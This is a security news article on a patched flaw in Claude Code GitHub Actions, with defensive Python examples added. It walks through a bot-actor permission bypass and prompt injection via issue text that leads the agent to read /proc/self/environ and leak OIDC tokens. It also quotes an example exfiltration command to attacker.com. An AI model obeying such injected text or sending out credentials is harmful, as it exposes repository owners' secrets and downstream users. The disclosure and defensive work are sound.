Claude’s GitHub Actions Flaw Compromises Any Repository

Jennifer sherman
June 2, 2026

A critical supply chain vulnerability in Claude Code’s GitHub Actions could allow attackers to compromise any repository using Anthropic’s official CI/CD workflow. This includes Anthropic’s own infrastructure.

The vulnerability, discovered by security researcher RyotaK of GMO Flatt Security and patched in Claude Code GitHub Actions v1.0.94, stems from a flawed permission model in the checkWritePermissions function.

When combined with prompt injection techniques, it could enable a fully unauthenticated external attacker to exfiltrate secrets, steal OIDC tokens, and push malicious code to any downstream repository that depends on the Claude Code GitHub Actions workflow.

Claude Code GitHub Actions restricts workflow execution to users with write or admin access. However, the checkWritePermissions function unconditionally trusted any actor ending in [bot] regardless of actual permissions.

Since GitHub Apps have implicit read access to public repositories and can create issues or pull requests on any public repo using only an installation token, an attacker could bypass this control entirely.

Claude Code’s GitHub Actions Vulnerability

The attack required just three steps: create a malicious GitHub App, install it on any attacker-controlled repository (no special permissions needed), and use its installation token to open an issue or pull request in the target repository.

Because the actor appeared as a GitHub App bot, the permission check returned true and the workflow processed the attacker-controlled content. While tag mode had an additional checkHumanActor check, agent mode lacked this safeguard at the time of discovery.
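The difference between trusting a login suffix and verifying the actor can be shown with a small model of the check. This is an added illustration, not code from Claude Code GitHub Actions: the function names, the permission table and the logins are hypothetical, and it assumes a human-actor check means the sender's account type is `User`.

```python
from typing import Callable, Optional

WRITE_LEVELS = {"write", "admin"}

def flawed_gate(event: dict, lookup: Callable[[str], Optional[str]]) -> bool:
    """The pattern the article describes: a login suffix is treated as authorization."""
    login = event["sender"]["login"]
    if login.endswith("[bot]"):
        return True  # never consults the actor's real permission
    return lookup(login) in WRITE_LEVELS

def hardened_gate(event: dict, lookup: Callable[[str], Optional[str]]):
    """Require a human account and a verified write/admin permission; fail closed."""
    sender = event["sender"]
    if sender.get("type") != "User":  # assumption: human means account type "User"
        return False, "non-human actor"
    try:
        level = lookup(sender["login"])
    except Exception:
        return False, "permission lookup failed"
    if level not in WRITE_LEVELS:
        return False, f"insufficient permission: {level}"
    return True, "ok"

# Constructed collaborator table and events (all logins are hypothetical).
PERMISSIONS = {"maintainer-alice": "admin", "visitor-bob": "read"}
EVENTS = [
    {"sender": {"login": "maintainer-alice", "type": "User"}},
    {"sender": {"login": "visitor-bob", "type": "User"}},
    {"sender": {"login": "unknown-app[bot]", "type": "Bot"}},
]

def compare(events=EVENTS, table=PERMISSIONS):
    """Return (login, flawed decision, hardened decision) for each event."""
    return [(e["sender"]["login"],
             flawed_gate(e, table.get),
             hardened_gate(e, table.get)[0]) for e in events]

if __name__ == "__main__":
    for row in compare():
        print(row)
```

Only the bot actor is decided differently: it has no entry in the permission table, yet the suffix check admits it.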

Once the bypass was achieved, the attacker could craft a malicious issue description containing a fake error message to trick Claude Code into executing embedded commands, a classic prompt injection attack.

Claude Code permits certain Bash commands (such as cat and head) without explicit user approval, allowing an attacker to read /proc/self/environ, a Linux pseudo-file exposing all environment variables passed to the workflow process.

Among those environment variables, the most sensitive are ACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL — the credentials used to request an OpenID Connect (OIDC) token from GitHub Actions.

Claude Code GitHub Actions uses this OIDC token to obtain a privileged Claude GitHub App installation token from Anthropic’s backend via https://api.anthropic.com/api/github/github-app-token-exchange.

With these exfiltrated credentials, an attacker could replicate the entire token exchange process and obtain a GitHub App token with write access to repository contents, issues, pull requests, and workflows.

The mcp__github__update_issue MCP tool permitted in Anthropic’s own issue triage workflow was then abused to write the stolen secrets back into a public issue, where the attacker could simply read them.

The most severe consequence was that the anthropics/claude-code-action repository itself used a vulnerable agent mode workflow. A successful exploit would allow an attacker to inject malicious code directly into the action’s source, which would then propagate to every downstream repository depending on it, a classic supply chain attack.

In total, the full attack chain involved seven steps: from creating a rogue GitHub App to pushing backdoored code to Anthropic’s own repository.

Separately, RyotaK identified a misconfiguration in Anthropic’s official example workflows using allowed_non_write_users: "*".

When combined with issues: write permissions and a second workflow using id-token: write, an external attacker could chain the two workflows: use the triage workflow to steal a GITHUB_TOKEN via Claude’s publicly visible workflow run summary, then edit an existing issue to inject prompts into the tag-mode workflow, ultimately escalating to full repository compromise without ever needing the GitHub App bypass.

Notably, even the gh issue view CLI command was weaponizable for exfiltration; prompt injection could instruct Claude to embed secrets in URL path arguments (e.g., gh issue view https://attacker.com/<secret>), sending credentials to an external server.

Anthropic addressed the vulnerabilities in Claude Code GitHub Actions v1.0.94. Fixes included adding a checkHumanActor call to agent mode, disabling the workflow run summary section by default, scrubbing environment variables from child processes spawned by Claude Code, and implementing a custom gh command wrapper that validates arguments and blocks exfiltration-capable URL patterns.

Anthropic also added logic to ignore issues and comments edited after a workflow is triggered, closing the workflow-chaining attack vector.
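Two of the mitigations above, scrubbing the child-process environment and validating gh arguments, can be sketched as follows. This is an added example and not Anthropic's wrapper: the function names, the prefix list, the refused flags and the `example-org/example-repo` repository are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Prefixes covering the variables named in the article; the exact list is an assumption.
SENSITIVE_PREFIXES = ("ACTIONS_ID_TOKEN_REQUEST_", "GITHUB_TOKEN", "ANTHROPIC_API_KEY")
ALLOWED_HOST = "github.com"  # assumption: gh should only ever address github.com

def scrubbed_env(env):
    """Copy of env without CI credentials, for passing to child processes."""
    return {k: v for k, v in env.items() if not k.startswith(SENSITIVE_PREFIXES)}

def validate_gh_args(args, repo):
    """Return (ok, reason); repo is the 'owner/name' the workflow runs in."""
    for arg in args:
        # This wrapper pins the repository itself, so selection flags are refused.
        if arg.startswith(("-R", "--repo", "--hostname")):
            return False, f"flag not allowed: {arg}"
        if "://" not in arg:
            continue
        try:
            url = urlsplit(arg)
            host = url.hostname
        except ValueError:
            return False, f"unparseable URL: {arg}"
        # Compare the parsed host exactly; substring checks accept look-alike hosts.
        if url.scheme != "https" or host != ALLOWED_HOST:
            return False, f"host not allowed: {host}"
        if not url.path.lower().startswith(f"/{repo.lower()}/"):
            return False, f"URL outside {repo}"
    return True, "ok"

def prepare_gh_call(args, repo, env):
    """Return (argv, child_env) for subprocess.run, or raise if validation fails."""
    ok, reason = validate_gh_args(args, repo)
    if not ok:
        raise PermissionError(reason)
    return ["gh", *args], scrubbed_env(env)

if __name__ == "__main__":
    repo = "example-org/example-repo"  # hypothetical repository
    print(validate_gh_args(["issue", "view", "https://attacker.com/<secret>"], repo))
    print(validate_gh_args(["issue", "view", "42"], repo))
```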

The researcher rated the vulnerabilities at a CVSS v4.0 score of 7.8. Anthropic awarded $3,800 plus a $1,000 bonus through its bug bounty program.

Users still running Claude Code GitHub Actions are advised to audit any workflow using allowed_non_write_users, restrict exposed secrets to only the Anthropic API key and GITHUB_TOKEN, and review workflow run logs for indicators of compromise.
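The workflow audit recommended above can be scripted. The following is an added example, not a tool from Anthropic or the researcher: it scans workflow text for use of anthropics/claude-code-action, reports `allowed_non_write_users`, write scopes and unexpected secrets, and flags the two-workflow combination described earlier. The sample workflows are constructed, and the secret names `ANTHROPIC_API_KEY` and `DEPLOY_KEY` are assumptions.

```python
import re

# Constructed sample workflows for illustration; not from any real repository.
WORKFLOWS = {
    "triage.yml": (
        "permissions:\n  issues: write\n"
        "jobs:\n  triage:\n    steps:\n"
        "      - uses: anthropics/claude-code-action@v1\n"
        "        with:\n"
        '          allowed_non_write_users: "*"\n'
        "        env:\n"
        "          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}\n"
    ),
    "assistant.yml": (
        "permissions:\n  contents: write\n  id-token: write\n"
        "jobs:\n  claude:\n    steps:\n"
        "      - uses: anthropics/claude-code-action@v1\n"
        "        env:\n"
        "          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}\n"
    ),
    "lint.yml": "jobs:\n  lint:\n    steps:\n      - run: make lint\n",
}

USES = re.compile(r"uses:\s*anthropics/claude-code-action@")
NON_WRITE = re.compile(r"allowed_non_write_users:\s*[\"']?([^\"'\n]+)")
WRITE_SCOPE = re.compile(r"^[ \t]*([a-z-]+):[ \t]*write[ \t]*$", re.M)
SECRET = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
EXPECTED_SECRETS = {"ANTHROPIC_API_KEY", "GITHUB_TOKEN"}  # names are assumptions

def audit_workflow(text):
    """Return findings for one workflow, or None if it does not use the action."""
    if not USES.search(text):
        return None
    m = NON_WRITE.search(text)
    return {
        "non_write_users": m.group(1).strip() if m else None,
        "write_scopes": sorted(set(WRITE_SCOPE.findall(text))),
        "extra_secrets": sorted(set(SECRET.findall(text)) - EXPECTED_SECRETS),
    }

def audit_repo(workflows):
    """Audit every workflow and list pairs matching the chained-workflow setup."""
    report = {n: f for n, t in workflows.items() if (f := audit_workflow(t))}
    open_triage = [n for n, f in report.items()
                   if f["non_write_users"] == "*" and "issues" in f["write_scopes"]]
    oidc = [n for n, f in report.items() if "id-token" in f["write_scopes"]]
    chain = [(a, b) for a in open_triage for b in oidc if a != b]
    return report, chain
```

Calling `audit_repo` on a mapping of file names to the contents of `.github/workflows/*.yml` returns the per-file findings and the risky pairs. The line-based matching is a triage aid and does not replace a YAML-aware review.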
